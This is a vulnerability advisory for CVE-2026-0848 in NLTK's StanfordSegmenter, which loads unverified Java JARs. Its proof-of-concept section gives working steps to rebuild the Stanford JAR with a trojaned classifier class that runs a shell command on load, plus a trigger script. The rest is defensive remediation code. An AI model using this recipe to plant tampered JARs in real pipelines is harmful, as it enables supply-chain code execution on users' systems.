📄 NLTK StanfordSegmenter 3.9.2 Arbitrary Code Execution

31 Mar 2026 · Reported by Sarvesh Patil · Type: packetstorm · Source: packetstorm.news

NLTK StanfordSegmenter loads external Java jars without verification, enabling supply-chain remote code execution.

# CVE-2026-0848 — NLTK StanfordSegmenter: Arbitrary Code Execution via Untrusted JAR Loading
    
    <p align="center">
      <img src="https://img.shields.io/badge/CVE-2026--0848-critical?style=for-the-badge&color=8B0000" />
      <img src="https://img.shields.io/badge/Severity-Critical%20(CVSS%2010.0)-red?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Affected-NLTK%20%3C%3D%203.9.2-yellow?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Type-CWE--20%20Improper%20Input%20Validation-blue?style=for-the-badge" />
      <img src="https://img.shields.io/badge/Fix-Merged%20(PR%20%233522)-brightgreen?style=for-the-badge" />
    </p>
    
    ---
    
    ## Overview
    
    | Field | Details |
    |---|---|
    | **CVE ID** | CVE-2026-0848 |
    | **Package** | `nltk` (Natural Language Toolkit) |
    | **Registry** | PyPI |
    | **Affected Versions** | `<= 3.9.2` |
    | **Vulnerability Type** | CWE-20: Improper Input Validation |
    | **CVSS Score** | 10.0 (Critical) |
    | **Attack Vector** | Network |
    | **Attack Complexity** | Low |
    | **Privileges Required** | None |
    | **User Interaction** | None |
    | **Scope** | Changed |
    | **Confidentiality Impact** | High |
    | **Integrity Impact** | High |
    | **Availability Impact** | High |
    | **Reported On** | December 6, 2025 |
    | **CVE Published** | March 2026 |
    | **Supported By** | Palo Alto Networks / Prisma AIRS |
    
    ---
    
    ## Description
    
    `nltk.tokenize.StanfordSegmenter` dynamically loads external Java `.jar` files via `subprocess` without performing any integrity verification, signature checking, or sandboxing. The class accepts fully attacker-controlled parameters including `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class`, and passes them directly to a `java -cp` invocation.
    
    If an attacker can supply or replace the JAR file — through a poisoned model download, a man-in-the-middle package swap, dependency poisoning, or a corrupted release mirror — arbitrary Java bytecode executes at class-load time via the JVM's static initializer mechanism. This constitutes a **supply-chain Remote Code Execution** vulnerability and fully escapes the Python runtime.
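
To make the data flow concrete, here is a deliberately simplified model of how constructor arguments can reach a `java -cp` command line unchanged. It is not NLTK's actual code: the function name `build_java_command` and its signature are hypothetical, and only the parameter names come from the description above.

```python
from typing import List, Optional


def build_java_command(
    path_to_jar: str, java_class: str, extra_args: Optional[List[str]] = None
) -> List[str]:
    """Hypothetical, simplified model of an unvalidated `java -cp` invocation."""
    # The JAR path becomes the classpath and the class name becomes the entry
    # point. Nothing here checks an allowlist, a checksum, or a signature.
    return ["java", "-cp", path_to_jar, java_class, *(extra_args or [])]


cmd = build_java_command(
    "stanford-segmenter.jar",
    "edu.stanford.nlp.ie.crf.CRFClassifier",
)
print(cmd)
```

Passing the command as an argument list avoids shell injection, but that does not help here: the risk is the content of the JAR named on the classpath, not the way the command is quoted.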
    
    ---
    
    ## Affected Components
    
    | File | Lines | Description |
    |---|---|---|
    | `nltk/tokenize/stanford_segmenter.py` | L53–L118 | Accepts attacker-controlled `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class` with no validation |
    | `nltk/internals.py` | L220–L300 | Launches Java execution directly with user-controlled JAR path and classpath, no sandboxing or checksum verification |
    | `nltk/internals.py` | L109–L152 | `subprocess.Popen()` executes Java with unvalidated classpath input, allowing the JVM to load arbitrary bytecode and run static initializers |
    
    ---
    
    ## CVSS Vector
    
    ```
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    ```
    
    | Metric | Value |
    |---|---|
    | Attack Vector | Network |
    | Attack Complexity | Low |
    | Privileges Required | None |
    | User Interaction | None |
    | Scope | Changed |
    | Confidentiality | High |
    | Integrity | High |
    | Availability | High |
    
    ---
    
    ## Impact
    
    Successful exploitation grants an attacker **full control over the system** running the NLTK segmentation process:
    
    - **Arbitrary Java code execution** — Any bytecode embedded in the malicious JAR runs with the privileges of the Python/Java process
    - **Python runtime escape** — Execution moves into the JVM, bypassing Python-level sandboxing entirely
    - **OS-level command execution** — Attackers can invoke `Runtime.getRuntime().exec()` or `ProcessBuilder` to run arbitrary shell commands
    - **Data theft and modification** — Access to all files, environment variables, API keys, and secrets readable by the process
    - **Full environment compromise** — In CI/CD, production NLP pipelines, or server environments, a single malicious JAR leads to complete host takeover
    
    ### High-Risk Deployment Scenarios
    
    | Scenario | Impact |
    |---|---|
    | ML researcher loads a pretrained segmenter from the internet | Remote attacker gains code execution |
    | Organization downloads a corrupted Chinese segmentation model ZIP | Malware executes inside production NLP pipeline |
    | CI/CD server installs model via `wget`/`unzip` from a non-HTTPS mirror | Full environment compromise |
    | Dependency takeover or poisoned release mirror | Complete supply-chain RCE |
    
    This vulnerability affects any NLP workflow using `StanfordSegmenter`, including chatbots, LLM preprocessing pipelines, dataset segmentation, document classification, and production inference services.
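
Several of the scenarios above start with a download over an untrusted channel. As a minimal sketch of one guard, a download helper can refuse any source that is not HTTPS before fetching anything. The function name `require_https` and the mirror URL are hypothetical.

```python
from urllib.parse import urlparse


def require_https(url: str) -> str:
    """Return the URL unchanged if it uses HTTPS; otherwise raise ValueError."""
    parsed = urlparse(url)
    if parsed.scheme != "https" or not parsed.netloc:
        raise ValueError(f"refusing non-HTTPS download source: {url!r}")
    return url


# The official segmenter page is accepted.
accepted = require_https("https://nlp.stanford.edu/software/segmenter.html")

# A plain-HTTP mirror (hypothetical host) is rejected.
try:
    require_https("http://mirror.example.org/stanford-segmenter.zip")
    rejected = False
except ValueError:
    rejected = True

print(accepted, rejected)
```

HTTPS protects the transfer only. It does not show that the file on the server is the one the publisher released, so this check complements checksum verification and does not replace it.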
    
    ---
    
    ## Proof of Concept
    
    > **This information is provided for educational and defensive purposes only. Do not test against systems you do not own or have explicit authorization to test.**
    
    ### Step 1 — Replace Core Classifier with Malicious Java Class
    
    ```bash
    cd stanford-segmenter-2020-11-17/merged
    jar xf ../stanford-segmenter-4.2.0.jar
    rm -rf edu/stanford/nlp/ie/crf/CRFClassifier.class
    
    cat << 'EOF' > edu/stanford/nlp/ie/crf/CRFClassifier.java
    package edu.stanford.nlp.ie.crf;
    
    public class CRFClassifier {
        static {
            try {
                System.out.println("\nPayload executed — Code ran on class load!\n");
                Runtime.getRuntime().exec("touch /tmp/pwned_hijack");
            } catch(Exception e){}
        }
        public static void main(String[] args){}
    }
    EOF
    
    javac edu/stanford/nlp/ie/crf/CRFClassifier.java
    jar cfm exploit.jar META-INF/MANIFEST.MF *
    cp exploit.jar ../stanford-segmenter.jar
    ```
    
    ### Step 2 — Build the Malicious JAR
    
    ```bash
    mkdir merged && cd merged
    javac Payload.java
    jar xf ../stanford-segmenter-4.2.0.jar
    jar xf ../stanford-corenlp-4.2.0/stanford-corenlp-4.2.0.jar
    jar cfm exploit.jar META-INF/MANIFEST.MF *
    jar uf exploit.jar Payload.class
    cp exploit.jar ../stanford-segmenter.jar
    cd ..
    ```
    
    ### Step 3 — Trigger via NLTK
    
    ```python
    # test.py
    from nltk.tokenize.stanford_segmenter import StanfordSegmenter
    
    print("[+] Triggering payload via modified Stanford JAR...")
    
    seg = StanfordSegmenter(
        path_to_jar="stanford-segmenter.jar",
        path_to_sihan_corpora_dict="./data/",
        path_to_dict="./data/dict-chris6.ser.gz",
        path_to_model="./data/pku.gz",
        java_class="edu.stanford.nlp.ie.crf.CRFClassifier",
        encoding="utf-8"
    )
    
    print("[+] Running segmentation...")
    print(seg.segment("我爱自然语言处理"))
    ```
    
    **Output:**
    
    ```
    [+] Triggering payload via modified Stanford JAR...
    
    Payload executed — Code ran on class load!
    
    [+] Running segmentation...
    我 爱 自然语言 处理
    ```
    
    **Confirm RCE:**
    
    ```bash
    ls /tmp | grep pwned_hijack
    # pwned_hijack
    ```
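
From the defender's side, a class replacement like the one above can be detected by comparing the suspect JAR against a copy obtained from a trusted source. The following sketch hashes every `.class` entry in both archives and reports the entries that are new or different. The helper names are hypothetical, and the demo uses placeholder bytes rather than real class files.

```python
import hashlib
import os
import tempfile
import zipfile
from typing import Dict, List


def class_digests(jar_path: str) -> Dict[str, str]:
    """Map each .class entry in a JAR (a ZIP archive) to its SHA-256 digest."""
    with zipfile.ZipFile(jar_path) as jar:
        return {
            name: hashlib.sha256(jar.read(name)).hexdigest()
            for name in jar.namelist()
            if name.endswith(".class")
        }


def changed_classes(trusted_jar: str, suspect_jar: str) -> List[str]:
    """Return class entries in suspect_jar that are new or differ from trusted_jar."""
    trusted = class_digests(trusted_jar)
    suspect = class_digests(suspect_jar)
    return sorted(n for n, d in suspect.items() if trusted.get(n) != d)


# Demo with two tiny stand-in archives (placeholder bytes, not real bytecode).
entry = "edu/stanford/nlp/ie/crf/CRFClassifier.class"
with tempfile.TemporaryDirectory() as tmp:
    good = os.path.join(tmp, "good.jar")
    bad = os.path.join(tmp, "bad.jar")
    with zipfile.ZipFile(good, "w") as jar:
        jar.writestr(entry, b"original bytes")
        jar.writestr("Other.class", b"same")
    with zipfile.ZipFile(bad, "w") as jar:
        jar.writestr(entry, b"replaced bytes")
        jar.writestr("Other.class", b"same")
    differing = changed_classes(good, bad)

print(differing)
```

This comparison only works if the reference JAR itself is trustworthy, for example one whose checksum was verified against the publisher's value.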
    
    ---
    
    ## Root Cause
    
    The vulnerability exists across two files:
    
    **`stanford_segmenter.py`**: The `StanfordSegmenter` class constructor accepts `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class` as plain string arguments and forwards them directly to the Java execution layer without performing any of the following:
    
    - Path allowlist or trusted-directory enforcement
    - SHA-256 or cryptographic signature verification of the JAR
    - Validation of the `java_class` parameter against a known-safe set of class names
    
    **`internals.py`**: The `java()` helper constructs and launches a `subprocess.Popen()` call with the user-supplied classpath. The JVM resolves the requested `java_class` from that classpath and runs its static initializer blocks before `main()` is invoked; other classes in the JAR are initialized when they are first used. There is no sandbox, no integrity gate, and no mechanism to prevent execution of injected bytecode.
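
The missing checks listed above could look roughly like the following. This is a sketch under stated assumptions, not the fix that was merged upstream: the function name `validate_segmenter_args`, the `trusted_dir` parameter, and the contents of `ALLOWED_JAVA_CLASSES` are all hypothetical.

```python
import tempfile
from pathlib import Path

# Assumption: the only entry point a deployment needs is the class used in
# the proof of concept above. A real allowlist would be set by the operator.
ALLOWED_JAVA_CLASSES = frozenset({"edu.stanford.nlp.ie.crf.CRFClassifier"})


def validate_segmenter_args(path_to_jar: str, java_class: str, trusted_dir: str) -> Path:
    """Reject JARs outside trusted_dir and class names outside the allowlist."""
    jar = Path(path_to_jar).resolve()
    root = Path(trusted_dir).resolve()
    if root not in jar.parents:
        raise ValueError(f"JAR is outside the trusted directory: {jar}")
    if not jar.is_file():
        raise ValueError(f"JAR does not exist: {jar}")
    if java_class not in ALLOWED_JAVA_CLASSES:
        raise ValueError(f"java_class is not allowlisted: {java_class!r}")
    return jar


with tempfile.TemporaryDirectory() as trusted, tempfile.TemporaryDirectory() as other:
    inside = Path(trusted) / "stanford-segmenter.jar"
    outside = Path(other) / "stanford-segmenter.jar"
    inside.write_bytes(b"placeholder")
    outside.write_bytes(b"placeholder")
    good_class = "edu.stanford.nlp.ie.crf.CRFClassifier"

    accepted = validate_segmenter_args(str(inside), good_class, trusted) == inside.resolve()

    try:
        validate_segmenter_args(str(outside), good_class, trusted)
        rejected_path = False
    except ValueError:
        rejected_path = True

    try:
        validate_segmenter_args(str(inside), "Payload", trusted)
        rejected_class = False
    except ValueError:
        rejected_class = True

print(accepted, rejected_path, rejected_class)
```

Path and class-name checks do not help if the JAR inside the trusted directory has itself been replaced, which is why the list above also calls for checksum or signature verification.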
    
    ---
    
    ## Fix
    
    The vulnerability has been fully resolved in the upstream NLTK repository.
    
    | Resource | Link |
    |---|---|
    | **Central Security Fix (all CVEs)** | [https://github.com/nltk/nltk/pull/3522](https://github.com/nltk/nltk/pull/3522) |
    | Researcher's initial fix PR | https://github.com/nltk/nltk/pull/3477 (merged) |
    
    Upgrade to a patched version of NLTK as soon as it is available on PyPI.
    
    ---
    
    ## Remediation
    
    | Action | Details |
    |---|---|
    | **Upgrade NLTK** | Update to a version greater than 3.9.2 containing the fix from PR #3522 |
    | **Do Not Use User-Controlled JAR Paths** | Never allow user input to influence `path_to_jar`, `path_to_model`, or `java_class` arguments |
    | **Verify JAR Integrity** | Always verify SHA-256 checksums of downloaded JAR files against official published hashes before use |
    | **Use HTTPS Sources Only** | Download model files and JARs exclusively from official HTTPS sources; reject any HTTP or unverified mirror |
    | **Least Privilege** | Run NLTK-based services under a restricted OS user with minimal filesystem and network permissions |
    | **Containerization** | Isolate NLP services in Docker containers or similar sandboxes to limit the blast radius of JAR-based exploits |
    | **Dependency Monitoring** | Use a software composition analysis tool to detect tampered or replaced JAR dependencies in CI/CD pipelines |
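
The integrity check in the table can be implemented with the standard library alone. The sketch below streams a file through SHA-256 and compares the result with an expected digest. The helper names are hypothetical, and in practice the expected value would come from the publisher's official release information, not from the same place as the download.

```python
import hashlib
import hmac
import os
import tempfile


def sha256_of_file(path: str, chunk_size: int = 1024 * 1024) -> str:
    """Hash a file in chunks so large JARs are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_jar(path: str, expected_sha256: str) -> None:
    """Raise ValueError unless the file's SHA-256 matches the expected hex digest."""
    actual = sha256_of_file(path)
    if not hmac.compare_digest(actual, expected_sha256.strip().lower()):
        raise ValueError(f"checksum mismatch for {path}: got {actual}")


# Demo on a stand-in file; the digest below is the SHA-256 of the bytes b"abc".
KNOWN_DIGEST = "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"
with tempfile.TemporaryDirectory() as tmp:
    jar_path = os.path.join(tmp, "stanford-segmenter.jar")
    with open(jar_path, "wb") as handle:
        handle.write(b"abc")
    verify_jar(jar_path, KNOWN_DIGEST)  # passes silently
    verified_ok = True

    with open(jar_path, "ab") as handle:
        handle.write(b"tampered")
    try:
        verify_jar(jar_path, KNOWN_DIGEST)
        tamper_detected = False
    except ValueError:
        tamper_detected = True

print(verified_ok, tamper_detected)
```

Running the check immediately before each `StanfordSegmenter` construction, rather than only at download time, also catches a JAR that was swapped on disk later.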
    
    **Upgrade via pip:**
    
    ```bash
    pip install --upgrade nltk
    ```
    
    **Verify installed version:**
    
    ```bash
    python -c "import nltk; print(nltk.__version__)"
    ```
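
For automated checks, for example in CI, the same comparison can be scripted. The source states only that versions up to and including 3.9.2 are affected and does not name the first fixed release, so this sketch flags the affected range and makes no claim about which later version to install. The helper names are hypothetical.

```python
import re
from importlib.metadata import PackageNotFoundError, version
from typing import Tuple

LAST_AFFECTED = (3, 9, 2)  # from the advisory: affected versions are <= 3.9.2


def parse_version(text: str) -> Tuple[int, ...]:
    """Parse the leading numeric components of a version string, e.g. '3.9.2'."""
    numbers = []
    for piece in text.split("."):
        match = re.match(r"\d+", piece)
        if not match:
            break
        numbers.append(int(match.group()))
    return tuple(numbers)


def is_affected(text: str) -> bool:
    """True if the version falls in the affected range (<= 3.9.2)."""
    return parse_version(text)[:3] <= LAST_AFFECTED


try:
    installed = version("nltk")
except PackageNotFoundError:
    installed = None

if installed is None:
    print("nltk is not installed")
elif is_affected(installed):
    print(f"nltk {installed} is in the affected range (<= 3.9.2)")
else:
    print(f"nltk {installed} is newer than the last affected version")
```

Reading the version through `importlib.metadata` avoids importing `nltk` itself, which keeps the check usable in minimal environments.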
    
    ---
    
    ## Timeline
    
    | Date | Event |
    |---|---|
    | December 6, 2025 | Vulnerability reported to huntr.dev by researcher hyperps1 (Sarvesh Patil) |
    | December 2025 | NLTK maintainer team notified via huntr.dev |
    | January 2026 | NLTK maintainer validated the vulnerability; disclosure bounty awarded |
    | January 2026 | CVE-2026-0848 assigned |
    | January 2026 | Researcher's fix PR #3477 submitted and merged |
    | February 2026 | 48-hour pre-publication warning sent to NLTK maintainers |
    | March 2026 | CVE published on NVD and huntr.dev |
    | March 2026 | Central security fix for all CVEs merged via PR #3522 |
    
    ---
    
    ## References
    
    | Resource | Link |
    |---|---|
    | NVD Entry | https://nvd.nist.gov/vuln/detail/CVE-2026-0848 |
    | Official CVE Record | https://cve.org/CVERecord?id=CVE-2026-0848 |
    | huntr.dev Report | https://huntr.dev |
    | Central Fix PR | https://github.com/nltk/nltk/pull/3522 |
    | Researcher Fix PR | https://github.com/nltk/nltk/pull/3477 |
    | NLTK on PyPI | https://pypi.org/project/nltk/ |
    | Stanford Word Segmenter | https://nlp.stanford.edu/software/segmenter.html |
    | OWASP: Code Injection | https://owasp.org/www-community/attacks/Code_Injection |
    | OWASP: Unsafe Use of Reflection | https://owasp.org/www-community/vulnerabilities/Unsafe_use_of_Reflection |
    | CWE-20: Improper Input Validation | https://cwe.mitre.org/data/definitions/20.html |
    | CWE-502: Deserialization of Untrusted Data | https://cwe.mitre.org/data/definitions/502.html |
    
    ---
    
    ## Disclaimer
    
    This repository documents CVE-2026-0848 strictly for **educational, research, and defensive security purposes**. The proof-of-concept code and technical details are provided to assist developers, security engineers, and system administrators in understanding, assessing, and remediating this vulnerability.
    
    Any use of this information to access or compromise systems without explicit authorization is illegal and unethical. The author assumes no liability for misuse of the information contained herein.
    
    Contributors: [ketanHub](https://github.com/ketanHub)

Vulners AI Score: 6.6 (medium risk) · CVSS 3: 10 · EPSS: 0.00307